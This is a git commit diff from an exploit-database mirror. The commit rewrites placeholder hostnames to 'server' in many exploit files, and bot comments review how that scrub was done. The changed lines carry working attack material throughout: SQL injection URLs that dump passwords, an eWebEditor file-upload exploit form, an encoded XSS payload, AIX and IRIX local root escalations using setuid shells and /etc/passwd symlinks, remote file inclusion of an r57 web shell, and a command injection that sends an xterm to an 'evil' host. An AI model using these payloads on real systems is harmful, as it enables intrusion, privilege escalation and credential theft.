DB: 2016-09-03
14 new exploits Too many to list!
This commit is contained in:
parent
f96ddba143
commit
31a21bb68d
8960 changed files with 12206 additions and 12354 deletions
|
@ -74,7 +74,7 @@ if len(sys.argv) < 3:
|
|||
|
||||
print " "
|
||||
|
||||
print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
|
||||
print ' usage: %s http://server/path/ day-mounth-year' % os.path.basename(sys.argv[0])
|
||||
|
||||
print " "
|
||||
|
||||
|
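Review bot: the replacement hostname `server` in the rewritten usage line (`http://server/path/ day-mounth-year`) is a bare single-label name, which a user who pastes the example literally will resolve against their local DNS search domain; the names reserved for documentation by RFC 2606 (`example.com`, `example.net`, `example.org`) avoid that and are already used elsewhere in this commit (`http://www.example.com/Portal/...`). While this line is being edited anyway, the `mounth` typo in the usage text could be corrected to `month` on both the usage and the `sys.exit` example lines.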
@ -88,7 +88,7 @@ if len(sys.argv) < 3:
|
|||
|
||||
print "_______________________________________________________________"
|
||||
|
||||
sys.exit("\nexample: http://www.server.com/ 16-10-2010")
|
||||
sys.exit("\nexample: http://server/ 16-10-2010")
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -13,4 +13,4 @@ $ set PATH=/tmp:$PATH
|
|||
$ export PATH
|
||||
$ /usr/bin/winstall
|
||||
$ /tmp/sh
|
||||
#
|
||||
#
|
|
@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/59/info
|
|||
/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.
|
||||
|
||||
$ /etc/crash
|
||||
! sh
|
||||
! sh
|
|
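Review bot: the removed and added lines of this hunk (`! sh` / `! sh`) are visibly identical, so the only change here is whitespace or line-ending normalization; the same pattern recurs in many hunks of this commit. Mixing such normalization into a hostname-scrub commit of 8960 files makes the substantive edits hard to review, so either split the normalization into its own commit or say in the commit message that line endings were normalized.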
@ -12,4 +12,4 @@ HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
|
|||
[ and it just hangs ]
|
||||
|
||||
$ ping some.where
|
||||
[ ...nothing... ]
|
||||
[ ...nothing... ]
|
|
@ -7,4 +7,4 @@ $ nmap -p 1-64000 -i <target host>
|
|||
|
||||
It is also claimed inetd will die if the Windows 95/NT
|
||||
program postscan.exe, made by 7thsphere, is run againts
|
||||
the host.
|
||||
the host.
|
|
@ -14,15 +14,15 @@ and no any filter for html code at robots.lib.php. you can inject your html code
|
|||
|
||||
html inj.:
|
||||
|
||||
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
|
||||
server/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
|
||||
|
||||
after you go here:
|
||||
|
||||
target.com/robotstats/info-robot.php?robot=(robot id)
|
||||
server/robotstats/info-robot.php?robot=(robot id)
|
||||
|
||||
or
|
||||
|
||||
target.com/robotstats/admin/robots.php you will see your html page
|
||||
server/robotstats/admin/robots.php you will see your html page
|
||||
|
||||
analysis: (/admin/robots.php)
|
||||
|
||||
|
|
|
@ -11,4 +11,4 @@ ln -s /etc/passwd /tmp/fwlsuser.$x
|
|||
let x=$x+1
|
||||
echo $x
|
||||
done
|
||||
exit
|
||||
exit
|
|
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/375/info
|
|||
|
||||
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
|
||||
|
||||
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.
|
||||
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.
|
|
@ -26,4 +26,4 @@ echo "cheezy mail hack" | rmail joeuser@nohost.com
|
|||
unsetenv IFS
|
||||
rm -f usr sh # minor cleanup.
|
||||
echo "Attempting to run sgid shell."
|
||||
./mailsh
|
||||
./mailsh
|
|
@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/455/info
|
|||
There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.
|
||||
|
||||
|
||||
/usr/sbin/lquerypv -h /pathtofilename
|
||||
/usr/sbin/lquerypv -h /pathtofilename
|
|
@ -4,4 +4,4 @@ The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vul
|
|||
|
||||
Run PrintStatus
|
||||
Press the 'help' button.
|
||||
Select the 'print to command' option. This will allow you to execute anything as root.
|
||||
Select the 'print to command' option. This will allow you to execute anything as root.
|
|
@ -7,4 +7,4 @@ gcc -g -o a.out hello-world.c
|
|||
$ adb a.out -
|
||||
adb
|
||||
.main,5:s
|
||||
a.out: running
|
||||
a.out: running
|
|
@ -14,4 +14,4 @@ chmod u+s /tmp/.shh
|
|||
EOF
|
||||
chmod a+x /tmp/aap/bin/Dctrl
|
||||
lsmcode
|
||||
/tmp/.shh
|
||||
/tmp/.shh
|
|
@ -4,4 +4,4 @@ IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue
|
|||
|
||||
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
|
||||
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
|
||||
fopen: No such file or directory
|
||||
fopen: No such file or directory
|
|
@ -8,4 +8,4 @@ IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulne
|
|||
|
||||
ps -ef > /tmp/log. $$
|
||||
grep test /tmp/log.
|
||||
$$ rm /tmp/log. $$
|
||||
$$ rm /tmp/log. $$
|
|
@ -13,4 +13,4 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
||||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
||||
xxxxxxxxxxx
|
||||
[dead]
|
||||
[dead]
|
|
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/64/info
|
|||
|
||||
There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.
|
||||
|
||||
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'
|
||||
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'
|
|
@ -4,4 +4,4 @@ NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsol
|
|||
|
||||
Gordano's own JUCE product (to prevent mail relay attacks and other SPAM activity) will not prevent NTMAIL v.3.x from being used as a mail relay.
|
||||
|
||||
Specify <> in the 'Mail From' field.
|
||||
Specify <> in the 'Mail From' field.
|
|
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/458/info
|
|||
|
||||
A problem with the way login parses arguments as passed by rlogind that may allow access to the root account.
|
||||
|
||||
%rlogin -froot targethost.com
|
||||
%rlogin -froot targethost.com
|
|
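Review bot: `targethost.com` in `%rlogin -froot targethost.com` is left unchanged on both sides of this hunk although it is a real registrable domain of the same kind as the `site.com` / `Target.com` placeholders this commit rewrites (`[~] 2.Search Target.com` becomes `[~] 2.Search server`), so the substitution pattern appears to match only the literal `site.com` / `target.com` strings; if the goal is to remove real-looking domains from published advisories, the pattern needs to cover variants like this one.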
@ -12,7 +12,7 @@
|
|||
|
||||
[~] 1.Save code html format
|
||||
|
||||
[~] 2.Search Target.com
|
||||
[~] 2.Search server
|
||||
|
||||
[~] 3.Edit and replace & Target
|
||||
|
||||
|
@ -26,7 +26,7 @@
|
|||
|
||||
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
|
||||
|
||||
[~] 9.Target.com/images/uploads/File/File Name
|
||||
[~] 9.server/images/uploads/File/File Name
|
||||
|
||||
[~]######################################### ExploiT
|
||||
#############################################[~]
|
||||
|
@ -62,7 +62,7 @@ Connector:<br />
|
|||
<option value="lasso/connector.lasso">Lasso</option>
|
||||
<option value="perl/connector.cgi">Perl</option>
|
||||
<option value="
|
||||
http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
|
||||
http://server/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
|
||||
">PHP</option>
|
||||
<option value="py/connector.py">Python</option>
|
||||
</select>
|
||||
|
|
|
@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in
|
|||
|
||||
TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected.
|
||||
|
||||
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>
|
||||
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>
|
|
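Review bot: the hostname scrub does not reach percent-encoded text, and this hunk shows it: the removed and added lines are identical, while the `unescape('...')` argument contains `%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D`, which decodes to the domain `vuln-lab.com`. If real domains are meant to be removed from the corpus, encoded forms (percent, HTML entities, base64) need a separate pass, or the line should be left clearly marked as an unscrubbed original.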
@ -46,4 +46,4 @@
|
|||
|
||||
************************************************************
|
||||
|
||||
************************************************************
|
||||
************************************************************
|
|
@ -23,4 +23,4 @@ soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
|||
<Item>0</Item>
|
||||
</tns:ArrayOfint>
|
||||
</soap:Body>
|
||||
</soap:Envelope>
|
||||
</soap:Envelope>
|
|
@ -4,4 +4,4 @@ Sigma Portal is prone to a denial-of-service vulnerability.
|
|||
|
||||
Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
|
||||
|
||||
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
|
||||
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
|
|
@ -30,7 +30,7 @@ if (@ARGV < 2)
|
|||
print " 2 ==> Version 1.36, 2.0 and Next\n";
|
||||
print "==========================================\n\n";
|
||||
print "Example:\n\n";
|
||||
print " Max.pl www.Site.com 1\n";
|
||||
print " Max.pl www.server 1\n";
|
||||
exit();
|
||||
}
|
||||
$hell = "foo' or M_Name='admin";
|
||||
|
|
|
@ -7,7 +7,7 @@ Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
|
|||
----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
|
||||
*/
|
||||
# Config ________________________________
|
||||
# address - example: http://www.site.com/password.asp
|
||||
# address - example: http://www.server/password.asp
|
||||
$url = "http://www.mohamad.com/password.asp";
|
||||
$mh = "s1";
|
||||
# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"
|
||||
|
|
|
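Review bot: only the comment was scrubbed here (`# address - example: http://www.server/password.asp`), while the actual default on the next context line, `$url = "http://www.mohamad.com/password.asp";`, still carries a real-looking domain. Since the script will send requests to whatever `$url` holds when run unmodified, the default value matters more than the comment; replace it with the same placeholder (or an RFC 2606 name) rather than leaving it as is.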
@ -23,4 +23,4 @@ http://server/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1
|
|||
Greetz :
|
||||
WwW.IQ-ty.CoM
|
||||
|
||||
| CraCkEr | Cyber-Zone | str0ke | jiko
|
||||
| CraCkEr | Cyber-Zone | str0ke | jiko
|
|
@ -1,4 +1,4 @@
|
|||
_ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _____1337~h4x0rZ__ _ ___ ___
|
||||
_ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _____1337~h4x0rZ__ _ ___ ___
|
||||
/_/Rd_ _ / _ _\/ _ _ / \ \< |/_ _ / /\ | \ /\ || \( ) /\ | \ (| |
|
||||
\_ _ _ _/ /_ _ / / __ | () / | | / / [d0t]com/@~\ | (O) / /+~\ ||_O_|( ) /0O\ | \ | |
|
||||
_ _ _ _\ \_ _ \ \ _ _ _ | \ | | / /_ _ /|__|\ | \ /|__|\|| O |( ) /+__+\| ^ \ | |
|
||||
|
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
[*] Err0r C0N50L3:
|
||||
|
||||
[*] www.target.com/player.asp?player_id={EV!L BL!ND INJ}
|
||||
[*] server/player.asp?player_id={EV!L BL!ND INJ}
|
||||
|
||||
|
||||
[*] EV!L BL!ND
|
||||
|
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
[*] Err0r C0N50L3:
|
||||
|
||||
[*] www.target.com/[path]/admin/edit.asp?ID={EV!L blind sql}
|
||||
[*] server/[path]/admin/edit.asp?ID={EV!L blind sql}
|
||||
|
||||
|
||||
[*] EV!L BL!ND sql
|
||||
|
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
[*] Err0r C0N50L3:
|
||||
|
||||
[*] www.target.com/[path]/campaignEdit.asp?CCam={EV!L blind sql}
|
||||
[*] server/[path]/campaignEdit.asp?CCam={EV!L blind sql}
|
||||
|
||||
|
||||
[*] EV!L BL!ND sql
|
||||
|
|
|
@ -67,4 +67,4 @@ Thanks You: eXceptioN,CodeInside,CorDoN,Hack3ra,Rex aL0ne,By_HKC
|
|||
|
||||
|
||||
|
||||
###########################################################################
|
||||
###########################################################################
|
|
@ -24,7 +24,7 @@ if (@ARGV < 1)
|
|||
print " Usage:ASPNuke.pl <T4rg3t> \n\n";
|
||||
print "==========================================\n\n";
|
||||
print "Examples:\n\n";
|
||||
print " ASPNuke.pl www.Site.com \n";
|
||||
print " ASPNuke.pl www.server \n";
|
||||
exit();
|
||||
}
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#####################################################
|
||||
#####################################################
|
||||
# [+] Author : RENO #
|
||||
# [+] Email : R7e@HoTMaiL.coM #
|
||||
# [+] Site : www.vxx9.cc #
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#####################################################
|
||||
#####################################################
|
||||
# [+] Author : RENO #
|
||||
# [+] Email : R7e@HoTMaiL.coM #
|
||||
# [+] Site : www.vxx9.cc #
|
||||
|
|
|
@ -26,7 +26,7 @@
|
|||
|
||||
[ª]dem0:
|
||||
|
||||
http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
|
||||
http://www.server/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
|
||||
|
||||
Admin:[Path]/admin/login.asp
|
||||
|
||||
|
|
|
@ -8,5 +8,5 @@
|
|||
# Risk: Medium
|
||||
#################################################################
|
||||
# Vulnerability:
|
||||
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
|
||||
# http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
|
||||
#################################################################
|
||||
|
|
|
@ -8,7 +8,7 @@ Vulnerability:
|
|||
=======================
|
||||
Arbitrary File Upload
|
||||
=======================
|
||||
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
|
||||
<form action = "http://server/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
|
||||
<p align="center">
|
||||
<input type=file name=uploadfile size=100><br> <br>
|
||||
<input type=submit value=Upload> </p>
|
||||
|
@ -18,19 +18,19 @@ Arbitrary File Upload
|
|||
=======================
|
||||
Arbitrary File Upload 2
|
||||
=======================
|
||||
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
|
||||
http://server/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
|
||||
|
||||
|
||||
=======================
|
||||
Database Disclosure
|
||||
=======================
|
||||
http://site.com/ewebeditor/db/ewebeditor.mdb
|
||||
http://server/ewebeditor/db/ewebeditor.mdb
|
||||
|
||||
|
||||
=======================
|
||||
Administrator bypass
|
||||
=======================
|
||||
http://site.com/eWebEditor/admin/login.asp
|
||||
http://server/eWebEditor/admin/login.asp
|
||||
|
||||
put this code instead URL
|
||||
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
|
||||
|
@ -39,11 +39,11 @@ javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
|
|||
=======================
|
||||
Directory Traversal
|
||||
=======================
|
||||
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
|
||||
http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
|
||||
|
||||
|
||||
=======================
|
||||
Directory Traversal 2
|
||||
=======================
|
||||
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..
|
||||
http://server/ewebeditor/asp/browse.asp?style=standard650&dir=./..
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#######################################################################
|
||||
#######################################################################
|
||||
# #
|
||||
### DA Mailing List System V2 Remote Admin Login Exploit ###
|
||||
# #
|
||||
|
|
|
@ -70,4 +70,4 @@ CoreLabs, the research center of Core Security Technologies, is charged with ant
|
|||
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
|
||||
12. Disclaimer
|
||||
|
||||
The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
|
||||
The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
|
|
@ -29,4 +29,4 @@
|
|||
*""""""""""""""""""""
|
||||
** Greetz to : ALLAH
|
||||
** All Members of http://www.DZ4All.cOm/Cc
|
||||
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....
|
||||
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....
|
|
@ -36,4 +36,4 @@ Dağları deviriverdin üstüme hiç çekinmedin
|
|||
Ben bu şehirde bir daha da sabah görmedim
|
||||
Günaydınlar olmadı günler aymadı sensiz ........
|
||||
|
||||
-------------------------------------------------------------------------------------------
|
||||
-------------------------------------------------------------------------------------------
|
|
@ -1,4 +1,4 @@
|
|||
=========================================
|
||||
=========================================
|
||||
Web Wiz Forums 9.68 SQLi Vulnerability
|
||||
=========================================
|
||||
|
||||
|
@ -22,9 +22,9 @@ Xploit: SQLi Vulnerability
|
|||
|
||||
DEMO URL:
|
||||
|
||||
http://site.com/new_reply_form.asp?TID=[SQLi]
|
||||
http://server/new_reply_form.asp?TID=[SQLi]
|
||||
|
||||
|
||||
###############################################################################################################
|
||||
# 0day no more
|
||||
# Sid3^effects
|
||||
# Sid3^effects
|
|
@ -1,4 +1,4 @@
|
|||
======================================================
|
||||
======================================================
|
||||
Virtual Real Estate Manager V 3.5 SQLi Vulnerability
|
||||
======================================================
|
||||
|
||||
|
@ -27,4 +27,4 @@ DEMO URL:
|
|||
|
||||
###############################################################################################################
|
||||
# 0day no more
|
||||
# Sid3^effects
|
||||
# Sid3^effects
|
|
@ -22,9 +22,9 @@ Xploit: SQLi Vulnerability
|
|||
|
||||
DEMO URL:
|
||||
|
||||
http://site.com/reallusiontv/ic/productdemo.asp?page=[SQLi]
|
||||
http://server/reallusiontv/ic/productdemo.asp?page=[SQLi]
|
||||
|
||||
|
||||
###############################################################################################################
|
||||
# 0day no more
|
||||
# Sid3^effects
|
||||
# Sid3^effects
|
|
@ -42,7 +42,7 @@ Admin Control:
|
|||
Usename:admin
|
||||
Password:admin
|
||||
|
||||
DEMO URL :http://site.com/onlinenotebookmanager.asp?ItemID=[SQLi]
|
||||
DEMO URL :http://server/onlinenotebookmanager.asp?ItemID=[SQLi]
|
||||
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
|
|
@ -18,7 +18,7 @@
|
|||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=1
|
||||
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
|
||||
Exploit Title:Smart ASP Survey SQL & XSS Vulnerable
|
||||
Vendor url:http://www.sellatsite.com
|
||||
Vendor url:http://www.sellatserver
|
||||
Version:n/a
|
||||
Published: 2010-06-15
|
||||
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to
|
||||
|
|
|
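Review bot: `Vendor url:http://www.sellatsite.com` has become `Vendor url:http://www.sellatserver`, which corrupts the vendor's real URL into a non-hostname; the substitution matched `site.com` as a substring of `sellatsite.com`. Vendor and software URLs are reference data that should be exempt from the scrub, and the pattern should be anchored so it cannot match inside a longer label (the same substring match turned `"somesite.com"` into `"someserver"` in the mini-nuke.pl usage text elsewhere in this commit).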
@ -19,7 +19,7 @@
|
|||
|
||||
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
|
||||
Exploit Title:SAS Hotel Management System SQL Vulnerable
|
||||
Vendor url:http://www.sellatsite.com
|
||||
Vendor url:http://www.sellatserver
|
||||
Version:n/a
|
||||
Price:28$
|
||||
Published: 2010-06-15
|
||||
|
|
|
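Review bot: same defect as in the Smart ASP Survey file: the vendor reference `Vendor url:http://www.sellatsite.com` is rewritten to `http://www.sellatserver`, destroying the one URL in this header that is supposed to point at a real site. Revert this line and exclude `Vendor url:` lines from the replacement.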
@ -32,4 +32,4 @@ Sex
|
|||
|
||||
Crew : IMHATIMI.ORG ~ MecTruy ~ Dr.Ly0n ~ Noxy ~ FreWaL
|
||||
|
||||
##################################################################################
|
||||
##################################################################################
|
|
@ -17,9 +17,9 @@
|
|||
|
||||
---
|
||||
|
||||
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
|
||||
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
|
||||
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
|
||||
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
|
||||
http://www.server/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
|
||||
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
|
||||
|
||||
---
|
||||
|
||||
|
@ -100,7 +100,7 @@ print q
|
|||
Usage:
|
||||
perl phportal.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
|
||||
<Target Website> - Path to target eg: www.victim.com
|
||||
<Shell Location> - Path to shell eg: http://site.com/r57.txt?
|
||||
<Shell Location> - Path to shell eg: http://server/r57.txt?
|
||||
<CMD Variable> - Shell command variable name eg: Pwd
|
||||
<r> - Show output from shell
|
||||
<p> - sablonlar/gunaysoft/gunaysoft.php
|
||||
|
|
|
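Review bot: the usage text is now inconsistent: `<Target Website> - Path to target eg: www.victim.com` keeps a real registrable domain on both sides of the hunk, while the very next line's `http://site.com/r57.txt?` is rewritten to `http://server/r57.txt?`. Apply the same placeholder policy to both lines, or the reader is left guessing which names are illustrative.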
@ -12,7 +12,7 @@ if (@ARGV < 3)
|
|||
print q(
|
||||
+++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
|
||||
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
|
||||
i.e. perl mini-nuke.pl "someserver" / 52 127.0.0.1:3128
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
);
|
||||
exit;
|
||||
|
|
|
@ -18,4 +18,4 @@ http://server/main.asp?id=5945&grp=[SQL Injection]
|
|||
|
||||
|
||||
[~]######################################### FinisH :D #############################################[~]
|
||||
|
||||
|
|
@ -27,11 +27,11 @@ i-Gallery is a complete online photo gallery. Easy to navigate thumbnails with p
|
|||
#######################################################################################################
|
||||
Xploit :Arbitrary File Include Vulnerabilty
|
||||
|
||||
DEMO URL http://www.site.com/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
|
||||
DEMO URL http://www.server/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
|
||||
|
||||
Xploit :Persistent XSS Vulnerabilty
|
||||
|
||||
DEMO URL http://www.site.com/igallery34/submitphotos.asp?mi=1
|
||||
DEMO URL http://www.server/igallery34/submitphotos.asp?mi=1
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -11,11 +11,11 @@ Dork : inurl:hikaye.asp?id=
|
|||
|
||||
===================================================
|
||||
|
||||
[+] Vulnerable File : http://www.site.com/hikaye.asp?id=123
|
||||
[+] Vulnerable File : http://www.server/hikaye.asp?id=123
|
||||
|
||||
===================================================
|
||||
|
||||
[+] Demo : http://www.site.com/hikaye.asp?id=17'a
|
||||
[+] Demo : http://www.server/hikaye.asp?id=17'a
|
||||
|
||||
===================================================
|
||||
|
||||
|
|
|
@ -11,11 +11,11 @@ Dork : inurl:makaledetay.asp?id=
|
|||
|
||||
===================================================
|
||||
|
||||
[+] Vulnerable File : http://www.site.com/makaledetay.asp?id=123
|
||||
[+] Vulnerable File : http://www.server/makaledetay.asp?id=123
|
||||
|
||||
===================================================
|
||||
|
||||
[+] Demo : http://www.site.com/makaledetay.asp?id=15%27a
|
||||
[+] Demo : http://www.server/makaledetay.asp?id=15%27a
|
||||
|
||||
===================================================
|
||||
|
||||
|
|
|
@ -13,14 +13,14 @@ Dork : :/ sorry
|
|||
|
||||
[+] Vulnerable File :
|
||||
|
||||
http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
|
||||
http://www.server/default.asp?islem=devami&id=38%20union+select+all+0,
|
||||
sifre,2,3%20,4,5+from+aky_ayarlar
|
||||
|
||||
===================================================
|
||||
|
||||
[+] Demo :
|
||||
|
||||
http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
|
||||
http://www.server/blog/default.asp?islem=devami&id=38%20union+s
|
||||
elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar
|
||||
|
||||
===================================================
|
||||
|
@ -31,4 +31,4 @@ and all www.worldhackerz.com Member
|
|||
|
||||
===================================================
|
||||
|
||||
# Turkish P0wer
|
||||
# Turkish P0wer
|
|
@ -1,4 +1,4 @@
|
|||
=======================================
|
||||
=======================================
|
||||
netStartEnterprise v4.0 SQL Injection Vulnerability
|
||||
=======================================
|
||||
|
||||
|
@ -15,7 +15,7 @@
|
|||
|
||||
# Version: netStartEnterprise v4.0
|
||||
|
||||
